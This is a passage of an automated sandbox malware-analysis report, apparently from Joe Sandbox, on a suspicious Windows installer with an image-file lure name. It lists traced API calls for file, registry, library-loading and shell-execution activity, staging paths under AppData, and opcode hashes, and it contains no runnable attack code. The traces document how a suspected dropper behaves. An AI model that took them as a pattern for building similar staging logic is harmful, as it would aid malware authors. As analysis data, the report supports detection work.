                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%s.dll$UXTHEME$\
                                        • API String ID: 2200240437-4240819195
                                        • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                        • Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
                                        • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                        • Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69

                                        Control-flow Graph

                                        [Control-flow graph image of the function at 6e33176b omitted; basic blocks were marked Executed or Not Executed]
                                        APIs
                                          • Part of subcall function 6E331B28: GlobalFree.KERNEL32(?), ref: 6E331D99
                                          • Part of subcall function 6E331B28: GlobalFree.KERNEL32(?), ref: 6E331D9E
                                          • Part of subcall function 6E331B28: GlobalFree.KERNEL32(?), ref: 6E331DA3
                                        • GlobalFree.KERNEL32(00000000), ref: 6E331816
                                        • FreeLibrary.KERNEL32(?), ref: 6E331899
                                        • GlobalFree.KERNEL32(00000000), ref: 6E3318BE
                                          • Part of subcall function 6E33233F: GlobalAlloc.KERNEL32(00000040,?), ref: 6E332370
                                          • Part of subcall function 6E332742: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6E3317E7,00000000), ref: 6E332812
                                          • Part of subcall function 6E3315FB: wsprintfA.USER32 ref: 6E331629
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088083079.000000006E331000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E330000, based on PE: true
                                        • Associated: 00000000.00000002.2088011783.000000006E330000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000000.00000002.2088098769.000000006E334000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000000.00000002.2088118015.000000006E336000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e330000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                        • String ID:
                                        • API String ID: 3962662361-3916222277
                                        • Opcode ID: 3e42cc902b781c67b6bc17be206e04dabb2fd17a76311f9f6ea2b3603f3ea253
                                        • Instruction ID: 6351ad8dc853541711ca2394ff7b01d28f9d350692347cf760268f22fd0dc41b
                                        • Opcode Fuzzy Hash: 3e42cc902b781c67b6bc17be206e04dabb2fd17a76311f9f6ea2b3603f3ea253
                                        • Instruction Fuzzy Hash: E241D0714002E69ADB409FF48994FEA77ECBF01314F3889B4E9959E086DF76814DC7A0

                                        Control-flow Graph

                                        [Control-flow graph image of the function at 401c53 omitted; basic blocks were marked Executed or Not Executed]
                                        APIs
                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                        • Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
                                        • Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                        • Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18

                                        Control-flow Graph

                                        [Control-flow graph image of the function at 4024a3 omitted; basic blocks were marked Executed or Not Executed]
                                        APIs
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv507D.tmp,00000023,00000011,00000002), ref: 004024EE
                                        • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv507D.tmp,00000000,00000011,00000002), ref: 0040252E
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsv507D.tmp,00000000,00000011,00000002), ref: 00402612
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CloseValuelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsv507D.tmp
                                        • API String ID: 2655323295-179125366
                                        • Opcode ID: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
                                        • Instruction ID: bcff8488b3c7483af384f27edc247fb8d09a012b63b7e061f1957b9ca53072ec
                                        • Opcode Fuzzy Hash: 01be07207417a34e2fd7276a7f8dd5bd622f6c843808a50c06c527054a50520e
                                        • Instruction Fuzzy Hash: A5118172E04118BFEF10AFA59E49AAE7AB4EB44314F20443FF505F71D1C6B98D829A18

                                        Control-flow Graph (basic blocks and edges; legend: Executed / Not Executed)
                                        • 849: 405e4f-405e59 -> 850
                                        • 850: 405e5a-405e85 (GetTickCount, GetTempFileNameA) -> 851, 852
                                        • 851: 405e94-405e96 -> 854
                                        • 852: 405e87-405e89 -> 850, 853
                                        • 853: 405e8b -> 854
                                        • 854: 405e8e-405e91
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405E63
                                        • GetTempFileNameA.KERNELBASE(0000000C,?,00000000,?,?,004033D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008), ref: 00405E7D
                                        Strings
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-678247507
                                        • Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                        • Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
                                        • Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                        • Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798
                                        APIs
                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020F5
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                          • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0), ref: 0040542D
                                          • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll), ref: 0040543F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402105
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                        • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040217F
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2987980305-0
                                        • Opcode ID: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                                        • Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
                                        • Opcode Fuzzy Hash: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                                        • Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E
                                        APIs
                                          • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405CC6
                                          • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                                          • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401632
                                          • Part of subcall function 00405897: CreateDirectoryA.KERNELBASE(?,?), ref: 004058D9
                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate,00000000,00000000,000000F0), ref: 00401661
                                        Strings
                                        • C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate, xrefs: 00401656
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                        • String ID: C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate
                                        • API String ID: 1892508949-1124611765
                                        • Opcode ID: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                                        • Instruction ID: 0b6d2b43488905cbaa276f6c0cac56371e043703d2fe031d841b632f48d4a949
                                        • Opcode Fuzzy Hash: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                                        • Instruction Fuzzy Hash: 3911E331904240AFDF307F754D41A7F26B0DA56724B68497FF891B22E2C63D49439A6E
                                        APIs
                                          • Part of subcall function 00405969: ShellExecuteExA.SHELL32(?,00404774,?), ref: 00405978
                                          • Part of subcall function 0040672A: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040673B
                                          • Part of subcall function 0040672A: GetExitCodeProcess.KERNEL32(?,?), ref: 0040675D
                                        • CloseHandle.KERNELBASE(?,?,?,?,?,?), ref: 00401FE5
                                        Strings
                                        • C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate, xrefs: 00401F6C
                                        • @, xrefs: 00401F89
                                        Similarity
                                        • API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
                                        • String ID: @$C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate
                                        • API String ID: 165873841-3200100611
                                        • Opcode ID: 4045d026b52495829b245bff0c8a860c6011144a5f3f89b1fb6398ee91597c2b
                                        • Instruction ID: 5ba2b647f7f38adafa31df8ed61492a5ad7c71a48fde22f3d1fa4ecdb07d8f9a
                                        • Opcode Fuzzy Hash: 4045d026b52495829b245bff0c8a860c6011144a5f3f89b1fb6398ee91597c2b
                                        • Instruction Fuzzy Hash: 63113A71E042099EDF51EFF9CA49A8DBBF4AF04318F14403AE115FB2D2D6B98946DB18
                                        APIs
                                          • Part of subcall function 00405DFB: GetFileAttributesA.KERNELBASE(?,?,00405A13,?,?,00000000,00405BF6,?,?,?,?), ref: 00405E00
                                          • Part of subcall function 00405DFB: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405E14
                                        • RemoveDirectoryA.KERNEL32(?,?,?,00000000,00405BF6), ref: 00405A22
                                        • DeleteFileA.KERNELBASE(?,?,?,00000000,00405BF6), ref: 00405A2A
                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405A42
                                        Similarity
                                        • API ID: File$Attributes$DeleteDirectoryRemove
                                        • String ID:
                                        • API String ID: 1655745494-0
                                        • Opcode ID: 043921b8c917d9d62ea668da32ed729a983a4b9cb196bdfb72cf9d57704c1844
                                        • Instruction ID: 6cbbeebccd270b92d1032a3138f2130d4a861fe222b861409a1048e863718438
                                        • Opcode Fuzzy Hash: 043921b8c917d9d62ea668da32ed729a983a4b9cb196bdfb72cf9d57704c1844
                                        • Instruction Fuzzy Hash: 7FE0E531314A915BC3105774AA8CA5B2A98DFC2315F050A3AF4A2B10C0CB78444A8F6D
                                        APIs
                                        • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402573
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsv507D.tmp,00000000,00000011,00000002), ref: 00402612
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID:
                                        • API String ID: 3356406503-0
                                        • Opcode ID: 2b7bc4f9418c8989dcd2ffdae205d0de7b18417eb2397653a7bee02426985274
                                        • Instruction ID: 97fa2cc47e124225833d1b044c3f4c0ff185fe65e0aec06a9837656ed07e9740
                                        • Opcode Fuzzy Hash: 2b7bc4f9418c8989dcd2ffdae205d0de7b18417eb2397653a7bee02426985274
                                        • Instruction Fuzzy Hash: 6511C171905205EFDF20CF60CA985AE7AB4EF01344F20883FE446B72C0D6B88A45DA1A
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                                        • Instruction ID: 80ce8cba2e1b90c3c9584b4bf9ae45de9eb83361fcac52349235150bfd3c5ac5
                                        • Opcode Fuzzy Hash: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                                        • Instruction Fuzzy Hash: C801F4317242209BE7295B399D08B6A36D8E710754F50823FF995F71F1E678CC028B5C
                                        APIs
                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040246F
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402478
                                        Similarity
                                        • API ID: CloseDeleteValue
                                        • String ID:
                                        • API String ID: 2831762973-0
                                        • Opcode ID: e954de63805926efc489198397230352766dfc3c3be1974fd50265881effd18f
                                        • Instruction ID: 01f6084b7650a9b213f52d22935e9030d34abb49b24569214b94c05b06999087
                                        • Opcode Fuzzy Hash: e954de63805926efc489198397230352766dfc3c3be1974fd50265881effd18f
                                        • Instruction Fuzzy Hash: D3F0B132604121AFDB60EBA49F4DA7F72A99B40314F15003FF101B71C1D9F84D42466E
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000011), ref: 00402674
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll, xrefs: 00402665, 0040268A
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll
                                        • API String ID: 1659193697-1987037384
                                        • Opcode ID: 366b14a8103b65e729c936a7bf154db847742850a32fdf27df13daa7337a2ab1
                                        • Instruction ID: 61272aa0762119994c047e7fd20119112025cf8b6efb119306360bab3c915050
                                        • Opcode Fuzzy Hash: 366b14a8103b65e729c936a7bf154db847742850a32fdf27df13daa7337a2ab1
                                        • Instruction Fuzzy Hash: CCF08972908244AADB20F7B65A49E5F66B49B81314B20443FE141B71C2C5FD45539A5E
                                        APIs
                                        • CreateDirectoryA.KERNELBASE(?,?), ref: 004058D9
                                        • GetLastError.KERNEL32 ref: 004058E7
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                                        • Instruction ID: 6d4ac730157cfa02be50de44a6d7979ff339f577f95dd1204a0ac4d64297c34f
                                        • Opcode Fuzzy Hash: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                                        • Instruction Fuzzy Hash: A3F0F971C0024DDADB00DFA4D5487DEBBB4AF04305F00802AD841B6280D7B882588B99
                                        APIs
                                        • ShowWindow.USER32(00000000,00000000), ref: 00401F08
                                        • EnableWindow.USER32(00000000,00000000), ref: 00401F13
                                        Similarity
                                        • API ID: Window$EnableShow
                                        • String ID:
                                        • API String ID: 1136574915-0
                                        • Opcode ID: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                                        • Instruction ID: ee44cb40e53ee45f72a0237e1ac7dd9bbdf9d48109a1395b289766a98c9c438f
                                        • Opcode Fuzzy Hash: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                                        • Instruction Fuzzy Hash: C9E04872A082049FEF64EBA4FE9556F77F4EB50365B20447FE101F11C2DA7849428A5D
                                        APIs
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: 43fc7ab4d8aab13bbe0e3b58b10b50637c22b5aa756d30fe598e07b3bf5632ed
                                        • Instruction ID: 6682d38faa1af99df36a0191d691bb63ef923b98cac77dddb2e5d8f8093f9b88
                                        • Opcode Fuzzy Hash: 43fc7ab4d8aab13bbe0e3b58b10b50637c22b5aa756d30fe598e07b3bf5632ed
                                        • Instruction Fuzzy Hash: 5AE04F727001109FCF64DB94EEA086E73E6E794310360043FD102B3290C6749C068A68
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                          • Part of subcall function 00406647: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                          • Part of subcall function 00406647: wsprintfA.USER32 ref: 00406697
                                          • Part of subcall function 00406647: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                        • String ID:
                                        • API String ID: 2547128583-0
                                        • Opcode ID: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                        • Instruction ID: a472cff2ba870c31c69f4352ad77424fb7bed112d4ffd52c95bf20a34481097e
                                        • Opcode Fuzzy Hash: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                        • Instruction Fuzzy Hash: BAE08C73A04210ABD610A6709E0883B73ACAF897413030C3EF952F2240DB3ADC32966E
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                        • Instruction ID: 0febe3887fb1e567d40345103610fd6f3e8d71b3c6328ccb34cdb50f288ecb70
                                        • Opcode Fuzzy Hash: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                        • Instruction Fuzzy Hash: 23D09E31254301AFEF099F20DE16F2E7AA2EB84B00F11952CB682A41E0DA7158299B15
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(?,?,00405A13,?,?,00000000,00405BF6,?,?,?,?), ref: 00405E00
                                        • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405E14
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 96c7ec262ab61fe6fea47152b5241fdb13327e4bfef36903235a76d16f55e530
                                        • Instruction ID: f779a6514c6a4e708396d8c5aab00734bb1243d63453d3b06c62658839fa2b1d
                                        • Opcode Fuzzy Hash: 96c7ec262ab61fe6fea47152b5241fdb13327e4bfef36903235a76d16f55e530
                                        • Instruction Fuzzy Hash: 20D0C9725056206BC2103B28EE0889BBB55DB542717028B35F9A9A22B0CB304C668B98
                                        APIs
                                        • CreateDirectoryA.KERNELBASE(?,00000000,004033CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004058F7
                                        • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405905
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                        • Instruction ID: 226d66ac6a6a747d722d053d5b09978fff7ae735be90135577c6d3bd4ef0b281
                                        • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                        • Instruction Fuzzy Hash: F9C04CB120490ADED6505B319F0971B7A51AB50751F175839A586E40A0DB348455DD2E
                                        APIs
                                        • EnumWindows.USER32(00000000), ref: 6E332B87
                                         Memory Dump Source
                                         • Source File: 00000000.00000002.2088083079.000000006E331000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E330000, based on PE: true
                                         • Associated: 00000000.00000002.2088011783.000000006E330000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000000.00000002.2088098769.000000006E334000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000000.00000002.2088118015.000000006E336000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e330000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: EnumWindows
                                        • String ID:
                                        • API String ID: 1129996299-0
                                        • Opcode ID: 8055c6cd7263a0502ae5bbe7c220ef61577e4dc02cbeb21349edda89ee5960d8
                                        • Instruction ID: 727c6230e5cf194a787ba7db330fe4506d9696b7633078e536b2f0dfad5b5830
                                        • Opcode Fuzzy Hash: 8055c6cd7263a0502ae5bbe7c220ef61577e4dc02cbeb21349edda89ee5960d8
                                        • Instruction Fuzzy Hash: CA413A729046A4AFDB309FA4DA81F9937BCEB05359F308865E54587210CB3A9581CFE1
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: wsprintf
                                        • String ID:
                                        • API String ID: 2111968516-0
                                        • Opcode ID: 27d70afe983ce046a9cdbd576e9bb3ab08da78768c3b3dac89c271fd87d57e25
                                        • Instruction ID: c5fbe62f9b4e2cb89eed07bb10574c4b4a04671343a68c93ee4f329e73b59f15
                                        • Opcode Fuzzy Hash: 27d70afe983ce046a9cdbd576e9bb3ab08da78768c3b3dac89c271fd87d57e25
                                        • Instruction Fuzzy Hash: 3521B530D04289EEDF318B6886586EEBBB09F01314F14407FE4D1B72E2C6BC8985CB69
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402776
                                          • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: FilePointerwsprintf
                                        • String ID:
                                        • API String ID: 327478801-0
                                        • Opcode ID: d0d9330acd65b2e867353bc74e86739eab35bf528f3ad37c96d6fee4195676f1
                                        • Instruction ID: 00adb5ebf99275c5c47ff66d1c826bee854e75ad94e87541b3f98b02de3c6d9f
                                        • Opcode Fuzzy Hash: d0d9330acd65b2e867353bc74e86739eab35bf528f3ad37c96d6fee4195676f1
                                        • Instruction Fuzzy Hash: E3E09272A04104AFDF50FBA4AE49DAF76B8EB40359B10043FF202F00C2CA7C4A538A2D
                                        APIs
                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402402
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringWrite
                                        • String ID:
                                        • API String ID: 390214022-0
                                        • Opcode ID: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                        • Instruction ID: f24de8215b53ecbcf80a61348f6bfc7870897c54b3e6c90e9d08f7162164e460
                                        • Opcode Fuzzy Hash: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                        • Instruction Fuzzy Hash: 9DE04F3160413A6BEB6036B11F8D97F2159AB84314B14053EBA11B62C6D9FC8E8352A9
                                        APIs
                                        • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402D0F,00000000,?,?), ref: 0040616A
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                        • Instruction ID: bbdc12591f07ec5b960d4a172b59ed2570ed34ba37628b65f55bcc9503456b15
                                        • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                        • Instruction Fuzzy Hash: 7AE0E6B2020109BEEF099F60DC1AD7B772DE708310F01492EFA06D4151E6B5E9705634
                                        APIs
                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403343,00000000,0041D440,000000FF,0041D440,000000FF,000000FF,00000004,00000000), ref: 00405EDB
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
